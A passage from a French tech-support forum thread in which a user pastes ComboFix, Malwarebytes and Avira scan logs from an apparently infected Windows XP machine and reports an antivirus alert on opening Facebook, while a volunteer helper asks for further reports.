2009-06-08 21:48 . 2007-07-18 17:27 -------- d-----w- c:\program files\Windows Live
2009-06-08 21:43 . 2007-07-18 17:27 -------- d-----w- c:\documents and settings\All Users\Application Data\WLInstaller
2009-06-08 21:15 . 2008-12-30 00:28 -------- d-----w- c:\program files\MSECACHE
2009-06-06 07:56 . 2007-03-19 17:48 -------- d-----w- c:\program files\lx_cats
2009-06-02 17:47 . 2009-05-08 11:07 -------- d-----w- c:\documents and settings\CLENET\Application Data\vlc
2009-06-02 17:46 . 2009-06-02 17:33 -------- d-----w- c:\documents and settings\CLENET\Application Data\DAEMON Tools Lite
2009-06-02 17:46 . 2008-06-04 00:31 -------- d-----w- c:\documents and settings\CLENET\Application Data\DAEMON Tools
2009-06-02 17:45 . 2009-06-02 17:45 -------- d-----w- c:\documents and settings\All Users\Application Data\DAEMON Tools Lite
2009-06-02 17:45 . 2009-06-02 17:45 -------- d-----w- c:\program files\DAEMON Tools Lite
2009-06-02 17:45 . 2009-06-02 17:45 -------- d-----w- c:\program files\DAEMON Tools Toolbar
2009-06-02 17:33 . 2008-06-04 00:31 721904 ----a-w- c:\windows\system32\drivers\sptd.sys
2009-05-28 17:38 . 2009-05-28 17:38 -------- d-----w- c:\program files\DVDFab HD Decrypter 4
2009-05-21 20:21 . 2004-08-07 11:49 -------- d-----w- c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2009-05-20 18:55 . 2009-05-20 18:53 -------- d-----w- c:\program files\Spybot - Search & Destroy
2009-05-13 05:04 . 2004-08-03 22:54 915456 ----a-w- c:\windows\system32\wininet.dll
2006-11-30 15:22 . 2006-11-30 15:22 18447022 ----a-w- c:\program files\openofficeorg1.cab
2006-11-30 15:17 . 2006-11-30 15:17 217 ----a-w- c:\program files\setup.ini
2006-11-30 15:17 . 2006-11-30 15:17 5298688 ----a-w- c:\program files\openofficeorg21.msi
2002-03-11 09:06 . 2002-03-11 09:06 1822520 ----a-w- c:\program files\instmsiw.exe
2002-03-11 08:45 . 2002-03-11 08:45 1708856 ----a-w- c:\program files\instmsia.exe
2005-01-19 09:48 . 2005-01-19 09:48 56 -csha-r- c:\windows\system32\68C1294D9F.sys
2005-01-19 09:48 . 2005-01-19 09:48 1890 -csha-w- c:\windows\system32\KGyGaAvL.sys
.

((((((((((((((((((((((((((((((((( Points de chargement Reg ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* les éléments vides & les éléments initiaux légitimes ne sont pas listés
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="c:\progra~1\FICHIE~1\MICROS~1\DW\dwtrig20.exe" [2005-04-25 36040]
"DAEMON Tools Lite"="c:\program files\DAEMON Tools Lite\daemon.exe" [2009-04-23 691656]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2004-08-03 15360]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"UserFaultCheck"="c:\windows\system32\dumprep 0 -u" [X]
"lxcrmon.exe"="c:\program files\Lexmark 2400 Series\lxcrmon.exe" [2006-03-06 286720]
"EzPrint"="c:\program files\Lexmark 2400 Series\ezprint.exe" [2006-02-07 98304]
"FaxCenterServer"="c:\program files\Lexmark Fax Solutions\fm3032.exe" [2006-02-02 290816]
"LXCRCATS"="c:\windows\System32\spool\DRIVERS\W32X86\3\LXCRtime.dll" [2006-02-24 65536]
"NeroFilterCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]
"NeroCheck"="c:\windows\System32\\NeroCheck.exe" [2001-07-09 155648]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-06-15 148888]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2009-03-02 209153]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2009-02-27 35696]

c:\documents and settings\CLENET\Menu D‚marrer\Programmes\D‚marrage\
OpenOffice.org 3.0.lnk - c:\program files\OpenOffice.org 3\program\quickstart.exe [2008-12-15 384000]

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\WINDOWS\\system32\\sessmgr.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\eMule\\emule.exe"=
"c:\\Program Files\\IncrediMail\\bin\\ImpCnt.exe"=
"c:\\Program Files\\Freeplayer\\vlc\\vlc.exe"=
"c:\\Program Files\\VideoLAN\\VLC\\vlc.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"c:\\Program Files\\Mozilla Thunderbird\\thunderbird.exe"=
"c:\\WINDOWS\\system32\\dpvsetup.exe"=
"c:\\Program Files\\MSN Messenger\\msnmsgr.exe"=
"c:\\Program Files\\MSN Messenger\\livecall.exe"=

R2 AntiVirSchedulerService;Avira AntiVir Planificateur;c:\program files\Avira\AntiVir Desktop\sched.exe [29/06/2009 22:13 108289]
S3 46028;46028;c:\windows\system32\46028.sys [28/06/2009 22:53 54624]
S3 fbxusb;Carte réseau virtuelle FreeBox USB;c:\windows\system32\drivers\fbxusb32.sys [20/10/2004 14:23 21344]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}]
"c:\windows\system32\rundll32.exe" "c:\windows\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
.
.
------- Examen supplémentaire -------
.
uStart Page = hxxp://google/
uInternet Settings,ProxyOverride = ;localhost;<local>
IE: E&xporter vers Microsoft Excel - c:\progra~1\MICROS~2\Office10\EXCEL.EXE/3000
IE: Pages liées
IE: Pages similaires
IE: Version de la page actuelle disponible dans le cache Google
TCP: {3404C9AD-EBFC-4296-9730-4861F1CE804D} = 217.27.32.5,213.228.0.168
DPF: DirectAnimation Java Classes - file://c:\windows\Java\classes\dajava.cab
DPF: Microsoft XML Parser for Java - file://c:\windows\Java\classes\xmldso.cab
FF - ProfilePath - c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\
FF - prefs.js: browser.search.defaulturl - hxxp://www.google.com/search?lr=&ie=UTF-8&oe=UTF-8&q=
FF - prefs.js: browser.startup.homepage - hxxp://fr.start2.mozilla.com/firefox?client=firefox-a&rls=org.mozilla:fr:official
FF - prefs.js: keyword.URL - hxxp://search.live.com/results.aspx?mkt=fr-FR&FORM=MIMWA2&q=
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}(2)
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}

---- PARAMETRES FIREFOX ----
FF - user.js: yahoo.homepage.dontask - truec:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("pref.browser.homepage.disable_button.bookmark_page", false);
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("pref.browser.homepage.disable_button.current_page", false);
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("pref.browser.homepage.disable_button.restore_default", false);
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("browser.places.importBookmarksHTML", true);
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("browser.places.importDefaults", false);
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("browser.search.selectedEngine", "xeoo.com");
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("keyword.URL", "http://xeoo.com/?p=url&a=firefox&k=");
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("browser.startup.homepage", "http://www.xeoo.com/?p=h&a=firefox");
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-07-03 19:05
Windows 5.1.2600 Service Pack 2 NTFS

Recherche de processus cachés ...

Recherche d'éléments en démarrage automatique cachés ...

Recherche de fichiers cachés ...

Scan terminé avec succès
Fichiers cachés: 0

**************************************************************************
.
--------------------- DLLs chargées dans les processus actifs ---------------------

- - - - - - - > 'explorer.exe'(1864)
c:\windows\system32\ntshrui.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\stobject.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
c:\windows\system32\NETSHELL.dll
c:\windows\system32\credui.dll
.
Heure de fin: 2009-07-03 19:08
ComboFix-quarantined-files.txt 2009-07-03 17:07

Avant-CF: 3 575 635 968 octets libres
Après-CF: 3 555 401 728 octets libres

200 --- E O F --- 2008-11-07 02:03

ComboFix 09-07-02.02 - CLENET 03/07/2009 19:02.3 - NTFSx86
Microsoft Windows XP Professionnel 5.1.2600.2.1252.33.1036.18.703.325 [GMT 2:00]
Lancé depuis: c:\documents and settings\CLENET\Bureau\ccm.exe
AV: AntiVir Desktop *On-access scanning disabled* (Updated) {AD166499-45F9-482A-A743-FDD3350758C7}
.

((((((((((((((((((((((((((((( Fichiers créés du 2009-06-03 au 2009-07-03 ))))))))))))))))))))))))))))))))))))
.

2009-07-01 00:32 . 2009-07-01 00:32 -------- d-----r- c:\documents and settings\LocalService\Favoris
2009-06-30 20:40 . 2009-06-30 20:40 -------- d-sh--w- c:\documents and settings\CLENET\IECompatCache
2009-06-29 21:09 . 2009-06-29 21:09 -------- d-sh--w- c:\documents and settings\LocalService\IETldCache
2009-06-29 20:13 . 2009-03-30 08:32 96104 ----a-w- c:\windows\system32\drivers\avipbb.sys
2009-06-29 20:13 . 2009-02-13 10:28 22360 ----a-w- c:\windows\system32\drivers\avgntmgr.sys
2009-06-29 20:13 . 2009-02-13 10:17 45416 ----a-w- c:\windows\system32\drivers\avgntdd.sys
2009-06-29 20:13 . 2009-06-29 20:13 -------- d-----w- c:\program files\Avira
2009-06-29 20:13 . 2009-06-29 20:13 -------- d-----w- c:\documents and settings\All Users\Application Data\Avira
2009-06-29 13:42 . 2009-07-03 12:11 -------- d-----w- c:\program files\trend micro
2009-06-29 13:24 . 2008-06-01 13:43 70656 -c--a-w- c:\windows\system32\dllcache\sysinfo.exe.REN
2009-06-29 13:24 . 2008-06-01 13:42 15360 -c--a-w- c:\windows\system32\dllcache\register.exe.REN
2009-06-29 08:55 . 2009-07-03 11:23 -------- d-----w- c:\program files\Panda Security
2009-06-28 21:01 . 2007-01-18 12:00 3968 ----a-w- c:\windows\system32\drivers\AvgArCln.sys
2009-06-28 20:53 . 2009-06-28 20:53 54624 ----a-w- c:\windows\system32\46028.sys
2009-06-15 17:59 . 2009-06-15 17:59 -------- d-sh--w- c:\documents and settings\CLENET\PrivacIE
2009-06-15 06:47 . 2009-06-15 06:47 -------- d-sh--w- c:\documents and settings\CLENET\IETldCache
2009-06-15 06:42 . 2009-03-24 12:43 43008 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\components\metricsloader.dll
2009-06-15 06:42 . 2009-03-24 12:43 43008 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\components\googletoolbarloader.dll
2009-06-15 06:42 . 2009-03-24 12:43 235520 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\libraries\metrics-ff2.dll
2009-06-15 06:42 . 2009-03-24 12:43 338432 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\libraries\googletoolbar-ff2.dll
2009-06-15 06:42 . 2009-03-24 12:42 235008 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\libraries\metrics-ff3.dll
2009-06-15 06:42 . 2009-03-24 12:42 345088 ----a-w- c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}\libraries\googletoolbar-ff3.dll
2009-06-15 04:55 . 2009-06-15 04:55 47338 ----a-w- c:\documents and settings\CLENET\temps11.vbs
2009-06-15 03:05 . 2009-06-15 03:05 -------- d-----w- c:\windows\ie8updates
2009-06-15 02:57 . 2009-06-15 03:03 -------- dc-h--w- c:\windows\ie8
2009-06-15 02:57 . 2009-06-15 03:02 -------- d-----w- c:\windows\system32\fr-FR
2009-06-15 02:44 . 2009-04-30 21:16 12800 -c----w- c:\windows\system32\dllcache\xpshims.dll
2009-06-15 02:44 . 2009-04-30 21:16 246272 -c----w- c:\windows\system32\dllcache\ieproxy.dll
2009-06-15 02:44 . 2009-04-30 21:16 1985024 -c----w- c:\windows\system32\dllcache\iertutil.dll
2009-06-15 02:43 . 2009-04-30 21:16 11064832 -c----w- c:\windows\system32\dllcache\ieframe.dll
2009-06-15 02:31 . 2009-05-12 05:11 102912 -c----w- c:\windows\system32\dllcache\iecompat.dll
2009-06-15 02:08 . 2009-06-15 02:08 -------- d-----w- c:\documents and settings\All Users\Application Data\McAfee
2009-06-15 02:07 . 2009-06-15 02:07 152576 ----a-w- c:\documents and settings\CLENET\Application Data\Sun\Java\jre1.6.0_14\lzma.dll
2009-06-14 13:11 . 2009-06-14 13:11 -------- d-----w- c:\program files\MSN Messenger
2009-06-14 12:30 . 2001-11-13 15:46 69632 ----a-r- c:\windows\system32\LVUI2RC.dll
2009-06-14 12:30 . 2001-11-13 15:46 200704 ----a-r- c:\windows\system32\LVUI2.dll
2009-06-14 12:30 . 2001-11-13 15:43 57344 ----a-r- c:\windows\system32\LVComC.dll
2009-06-14 12:30 . 2001-11-13 15:45 172032 ----a-r- c:\windows\system32\lvcodec2.dll
2009-06-14 12:30 . 2001-11-13 15:45 53248 ----a-r- c:\windows\system32\LVFWWDMT.dll
2009-06-14 12:30 . 2001-11-13 15:43 98304 ----a-r- c:\windows\system32\LVComS.exe
2009-06-14 12:30 . 2001-11-13 15:41 38912 ----a-r- c:\windows\system32\drivers\lvcd.sys
2009-06-14 12:30 . 2001-11-13 15:39 412672 ----a-r- c:\windows\system32\drivers\lvcodek2.dll
2009-06-14 12:30 . 2001-11-13 15:40 59904 ----a-r- c:\windows\system32\drivers\lvcam2.dll
2009-06-12 15:11 . 2009-06-12 15:11 -------- d-----w- c:\windows\system32\wbem\Repository
2009-06-09 01:18 . 2009-06-09 01:18 -------- d-----w- c:\program files\Fichiers communs\Labtec
2009-06-09 01:17 . 2009-06-14 13:02 -------- d-----w- c:\program files\Fichiers communs\LogiShrd
2009-06-06 22:19 . 2005-08-25 20:10 9804 ----a-w- c:\windows\system\vdremote.dll
2009-06-06 22:19 . 2005-08-25 20:09 7244 ----a-w- c:\windows\system\vdsvrlnk.dll
2009-06-06 22:19 . 2005-12-09 13:00 -------- d-----w- c:\program files\VirtualDub
2009-06-06 22:17 . 2009-06-06 22:17 -------- d-----w- c:\program files\XviD

.
(((((((((((((((((((((((((((((((((( Compte-rendu de Find3M ))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-07-03 16:53 . 2008-01-03 15:35 -------- d-----w- c:\documents and settings\CLENET\Application Data\FileZilla
2009-07-03 09:47 . 2008-05-20 08:40 -------- d-----w- c:\program files\Mozilla Thunderbird
2009-07-02 15:56 . 2009-02-09 12:51 1 ----a-w- c:\documents and settings\CLENET\Application Data\OpenOffice.org\3\user\uno_packages\cache\stamp.sys
2009-07-02 13:36 . 2008-02-13 14:20 -------- d-----w- c:\program files\Fichiers communs\Adobe
2009-06-30 12:34 . 2007-05-14 05:37 -------- d-----w- c:\program files\eMule
2009-06-30 11:18 . 2004-07-14 12:49 -------- d-----w- c:\documents and settings\CLENET\Application Data\dvdcss
2009-06-29 13:35 . 2001-08-28 12:00 73020 ----a-w- c:\windows\system32\perfc00C.dat
2009-06-29 13:35 . 2001-08-28 12:00 464474 ----a-w- c:\windows\system32\perfh00C.dat
2009-06-18 17:34 . 2009-02-16 09:13 -------- d-----w- c:\documents and settings\CLENET\Application Data\Spotify
2009-06-17 22:02 . 2008-06-01 12:45 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2009-06-17 22:02 . 2008-10-07 11:16 3561743 ----a-w- c:\documents and settings\All Users\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\mbam-setup.exe
2009-06-17 09:27 . 2008-10-07 11:16 38160 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2009-06-17 09:27 . 2008-06-01 12:45 19096 ----a-w- c:\windows\system32\drivers\mbam.sys
2009-06-15 02:35 . 2009-06-15 02:35 0 ----a-w- c:\documents and settings\CLENET\errorlog.tmp
2009-06-15 02:10 . 2009-05-31 01:13 410984 ----a-w- c:\windows\system32\deploytk.dll
2009-06-15 02:10 . 2008-06-01 21:52 -------- d-----w- c:\program files\Java
2009-06-10 15:23 . 2006-09-09 20:45 -------- d-----w- c:\documents and settings\All Users\Application Data\DVD Shrink
2009-06-09 01:38 . 2005-09-05 20:51 -------- d-----w- c:\program files\Fichiers communs\Real
2009-06-08 21:48 . 2007-07-18 17:27 -------- d-----w- c:\program files\Windows Live
2009-06-08 21:43 . 2007-07-18 17:27 -------- d-----w- c:\documents and settings\All Users\Application Data\WLInstaller
2009-06-08 21:15 . 2008-12-30 00:28 -------- d-----w- c:\program files\MSECACHE
2009-06-06 07:56 . 2007-03-19 17:48 -------- d-----w- c:\program files\lx_cats
2009-06-02 17:47 . 2009-05-08 11:07 -------- d-----w- c:\documents and settings\CLENET\Application Data\vlc
2009-06-02 17:46 . 2009-06-02 17:33 -------- d-----w- c:\documents and settings\CLENET\Application Data\DAEMON Tools Lite
2009-06-02 17:46 . 2008-06-04 00:31 -------- d-----w- c:\documents and settings\CLENET\Application Data\DAEMON Tools
2009-06-02 17:45 . 2009-06-02 17:45 -------- d-----w- c:\documents and settings\All Users\Application Data\DAEMON Tools Lite
2009-06-02 17:45 . 2009-06-02 17:45 -------- d-----w- c:\program files\DAEMON Tools Lite
2009-06-02 17:45 . 2009-06-02 17:45 -------- d-----w- c:\program files\DAEMON Tools Toolbar
2009-06-02 17:33 . 2008-06-04 00:31 721904 ----a-w- c:\windows\system32\drivers\sptd.sys
2009-05-28 17:38 . 2009-05-28 17:38 -------- d-----w- c:\program files\DVDFab HD Decrypter 4
2009-05-21 20:21 . 2004-08-07 11:49 -------- d-----w- c:\documents and settings\All Users\Application Data\Spybot - Search & Destroy
2009-05-20 18:55 . 2009-05-20 18:53 -------- d-----w- c:\program files\Spybot - Search & Destroy
2009-05-13 05:04 . 2004-08-03 22:54 915456 ----a-w- c:\windows\system32\wininet.dll
2006-11-30 15:22 . 2006-11-30 15:22 18447022 ----a-w- c:\program files\openofficeorg1.cab
2006-11-30 15:17 . 2006-11-30 15:17 217 ----a-w- c:\program files\setup.ini
2006-11-30 15:17 . 2006-11-30 15:17 5298688 ----a-w- c:\program files\openofficeorg21.msi
2002-03-11 09:06 . 2002-03-11 09:06 1822520 ----a-w- c:\program files\instmsiw.exe
2002-03-11 08:45 . 2002-03-11 08:45 1708856 ----a-w- c:\program files\instmsia.exe
2005-01-19 09:48 . 2005-01-19 09:48 56 -csha-r- c:\windows\system32\68C1294D9F.sys
2005-01-19 09:48 . 2005-01-19 09:48 1890 -csha-w- c:\windows\system32\KGyGaAvL.sys
.

((((((((((((((((((((((((((((((((( Points de chargement Reg ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* les éléments vides & les éléments initiaux légitimes ne sont pas listés
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="c:\progra~1\FICHIE~1\MICROS~1\DW\dwtrig20.exe" [2005-04-25 36040]
"DAEMON Tools Lite"="c:\program files\DAEMON Tools Lite\daemon.exe" [2009-04-23 691656]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2004-08-03 15360]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"UserFaultCheck"="c:\windows\system32\dumprep 0 -u" [X]
"lxcrmon.exe"="c:\program files\Lexmark 2400 Series\lxcrmon.exe" [2006-03-06 286720]
"EzPrint"="c:\program files\Lexmark 2400 Series\ezprint.exe" [2006-02-07 98304]
"FaxCenterServer"="c:\program files\Lexmark Fax Solutions\fm3032.exe" [2006-02-02 290816]
"LXCRCATS"="c:\windows\System32\spool\DRIVERS\W32X86\3\LXCRtime.dll" [2006-02-24 65536]
"NeroFilterCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]
"NeroCheck"="c:\windows\System32\\NeroCheck.exe" [2001-07-09 155648]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-06-15 148888]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2009-03-02 209153]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2009-02-27 35696]

c:\documents and settings\CLENET\Menu D‚marrer\Programmes\D‚marrage\
OpenOffice.org 3.0.lnk - c:\program files\OpenOffice.org 3\program\quickstart.exe [2008-12-15 384000]

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\WINDOWS\\system32\\sessmgr.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\eMule\\emule.exe"=
"c:\\Program Files\\IncrediMail\\bin\\ImpCnt.exe"=
"c:\\Program Files\\Freeplayer\\vlc\\vlc.exe"=
"c:\\Program Files\\VideoLAN\\VLC\\vlc.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"c:\\Program Files\\Mozilla Thunderbird\\thunderbird.exe"=
"c:\\WINDOWS\\system32\\dpvsetup.exe"=
"c:\\Program Files\\MSN Messenger\\msnmsgr.exe"=
"c:\\Program Files\\MSN Messenger\\livecall.exe"=

R2 AntiVirSchedulerService;Avira AntiVir Planificateur;c:\program files\Avira\AntiVir Desktop\sched.exe [29/06/2009 22:13 108289]
S3 46028;46028;c:\windows\system32\46028.sys [28/06/2009 22:53 54624]
S3 fbxusb;Carte réseau virtuelle FreeBox USB;c:\windows\system32\drivers\fbxusb32.sys [20/10/2004 14:23 21344]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}]
"c:\windows\system32\rundll32.exe" "c:\windows\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
.
.
------- Examen supplémentaire -------
.
uStart Page = hxxp://google/
uInternet Settings,ProxyOverride = ;localhost;<local>
IE: E&xporter vers Microsoft Excel - c:\progra~1\MICROS~2\Office10\EXCEL.EXE/3000
IE: Pages liées
IE: Pages similaires
IE: Version de la page actuelle disponible dans le cache Google
TCP: {3404C9AD-EBFC-4296-9730-4861F1CE804D} = 217.27.32.5,213.228.0.168
DPF: DirectAnimation Java Classes - file://c:\windows\Java\classes\dajava.cab
DPF: Microsoft XML Parser for Java - file://c:\windows\Java\classes\xmldso.cab
FF - ProfilePath - c:\documents and settings\CLENET\Application Data\Mozilla\Firefox\Profiles\tp3dl9ou.default\
FF - prefs.js: browser.search.defaulturl - hxxp://www.google.com/search?lr=&ie=UTF-8&oe=UTF-8&q=
FF - prefs.js: browser.startup.homepage - hxxp://fr.start2.mozilla.com/firefox?client=firefox-a&rls=org.mozilla:fr:official
FF - prefs.js: keyword.URL - hxxp://search.live.com/results.aspx?mkt=fr-FR&FORM=MIMWA2&q=
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}(2)
FF - HiddenExtension: Java Console: No Registry Reference - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}

---- PARAMETRES FIREFOX ----
FF - user.js: yahoo.homepage.dontask - truec:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("pref.browser.homepage.disable_button.bookmark_page", false);
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("pref.browser.homepage.disable_button.current_page", false);
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("pref.browser.homepage.disable_button.restore_default", false);
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("browser.places.importBookmarksHTML", true);
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("browser.places.importDefaults", false);
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("browser.search.selectedEngine", "xeoo.com");
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("keyword.URL", "http://xeoo.com/?p=url&a=firefox&k=");
c:\program files\Mozilla Firefox\defaults\profile\prefs.js - user_pref("browser.startup.homepage", "http://www.xeoo.com/?p=h&a=firefox");
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-07-03 19:05
Windows 5.1.2600 Service Pack 2 NTFS

Recherche de processus cachés ...

Recherche d'éléments en démarrage automatique cachés ...

Recherche de fichiers cachés ...

Scan terminé avec succès
Fichiers cachés: 0

**************************************************************************
.
--------------------- DLLs chargées dans les processus actifs ---------------------

- - - - - - - > 'explorer.exe'(1864)
c:\windows\system32\ntshrui.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\stobject.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
c:\windows\system32\NETSHELL.dll
c:\windows\system32\credui.dll
.
Heure de fin: 2009-07-03 19:08
ComboFix-quarantined-files.txt 2009-07-03 17:07

Avant-CF: 3 575 635 968 octets libres
Après-CF: 3 555 401 728 octets libres

200 --- E O F --- 2008-11-07 02:03
Malwarebytes' Anti-Malware 1.38
Version de la base de données: 2367
Windows 5.1.2600 Service Pack 2

03/07/2009 21:01:17
mbam-log-2009-07-03 (21-01-17).txt

Type de recherche: Examen complet (C:\|F:\|H:\|I:\|J:\|)
Eléments examinés: 157677
Temps écoulé: 35 minute(s), 13 second(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 0

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
(Aucun élément nuisible détecté)

Réponse 28 / 32

happygirly Messages postés 102 Statut Membre

Re,

HEUR/Exploit.HTML détecté à l'ouverture de Facebook par antivir, mit 1 en quarantaine et l'autre refusé l'accés.
Des avis?
Pfff!!! Quand est ce que ça va cesser?

Réponse 29 / 32

jlpjlp Messages postés 52399 Statut Contributeur sécurité 5 040

ok colle un rapport antivir

happygirly Messages postés 102 Statut Membre

Bonjour,

Avira AntiVir Personal
Date de création du fichier de rapport : samedi 4 juillet 2009 12:24

La recherche porte sur 1446709 souches de virus.

Détenteur de la licence : Avira AntiVir Personal - FREE Antivirus
Numéro de série : 0000149996-ADJIE-0000001
Plateforme : Windows XP
Version de Windows : (Service Pack 2) [5.1.2600]
Mode Boot : Démarré normalement
Identifiant : SYSTEM
Nom de l'ordinateur : CLENET-ILURQE0A

Informations de version :
BUILD.DAT : 9.0.0.65 17959 Bytes 22/04/2009 12:06:00
AVSCAN.EXE : 9.0.3.6 466689 Bytes 21/04/2009 12:20:54
AVSCAN.DLL : 9.0.3.0 49409 Bytes 03/03/2009 09:21:02
LUKE.DLL : 9.0.3.2 209665 Bytes 20/02/2009 10:35:11
LUKERES.DLL : 9.0.2.0 13569 Bytes 03/03/2009 09:21:31
ANTIVIR0.VDF : 7.1.0.0 15603712 Bytes 27/10/2008 11:30:36
ANTIVIR1.VDF : 7.1.4.132 5707264 Bytes 24/06/2009 20:19:36
ANTIVIR2.VDF : 7.1.4.173 306688 Bytes 02/07/2009 22:28:31
ANTIVIR3.VDF : 7.1.4.180 29696 Bytes 03/07/2009 22:28:50
Version du moteur : 8.2.0.204
AEVDF.DLL : 8.1.1.1 106868 Bytes 29/06/2009 20:19:44
AESCRIPT.DLL : 8.1.2.13 426362 Bytes 02/07/2009 22:28:34
AESCN.DLL : 8.1.2.3 127347 Bytes 29/06/2009 20:19:43
AERDL.DLL : 8.1.2.2 438642 Bytes 02/07/2009 22:28:33
AEPACK.DLL : 8.1.3.18 401783 Bytes 29/06/2009 20:19:43
AEOFFICE.DLL : 8.1.0.38 196987 Bytes 29/06/2009 20:19:42
